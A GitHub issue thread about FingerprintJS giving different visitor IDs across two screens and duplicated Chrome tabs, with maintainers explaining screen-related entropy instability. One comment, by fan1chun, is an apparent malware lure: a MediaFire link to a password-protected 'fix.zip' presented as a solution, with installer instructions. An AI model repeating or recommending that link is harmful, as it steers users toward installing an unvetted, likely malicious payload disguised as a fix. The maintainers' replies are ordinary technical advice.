### ISSUE TITLE
When using two screens, it produces two different IDs

### ISSUE THREAD

**Issue by duyhung1366** [fingerprintjs/fingerprintjs#1026]
Here is my code snippet
```
import FingerprintJS from '@fingerprintjs/fingerprintjs';
import sha256 from 'crypto-js/sha256';
import Base64 from 'crypto-js/enc-base64';

const useGetDeviceId = () => {
    const generateDeviceId = async () => {
        const fp = await FingerprintJS.load();
        const result = await fp.get({});
        const deviceId = result.visitorId;

        return deviceId;
    }

    return { 
        generateDeviceId
    }
}
export default useGetDeviceId;
```
My browser is Chrome, and I am using two screens on a single device. When I open two tabs in Chrome, the IDs generated by FingerprintJS are different. I want the IDs to be the same. Please provide a solution. Thank you, FingerprintJS team.

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JuroUhlar** [comment]
Hi @duyhung1366,

We need to distinguish two different situations: 

1) Getting a FingerprintJS identifier on one screen, dragging the window to another screen, and getting a different FingerprintJS identifier is expected. That is because `screenFrame` and potentially other screen-related attributes have changed. To avoid this problem, you can remove `screenFrame` etc. [from the entropy components](https://github.com/fingerprintjs/fingerprintjs/blob/master/docs/extending.md) or consider upgrading to [Fingerprint Pro](https://fingerprint.com/github/). Is this the scenario you are referring to?

2) Even with a single screen, I was able to reproduce the following behavior in Chrome

* Open a new tab and go to https://fingerprintjs.github.io/fingerprintjs/
* Right click on the tab -> Duplicate 
* A new tab opens with a different identifier.

This seems to be caused by the duplicated tab having different plugins. Here is a diff: https://www.diffchecker.com/2dS55iut/

![image](https://github.com/user-attachments/assets/29e3de0b-3ac9-4ee2-8345-297f490fd570)

@Finesse is this second behavior expected? Thank you!

**Comment by Finesse** [comment]
Screen is a well-known source of instability (#352, #568, #706, #725, https://github.com/fingerprintjs/fingerprintjs/issues/987#issuecomment-1970688635). I agree with what @JuroUhlar suggested. I can also add that we don't consider it as a critical bug because it produces only 2 fingerprints, i.e. you can't change your identity indefinitely.

> @Finesse is this second behavior expected? Thank you!

It doesn't reproduce reliably, so it's ok.
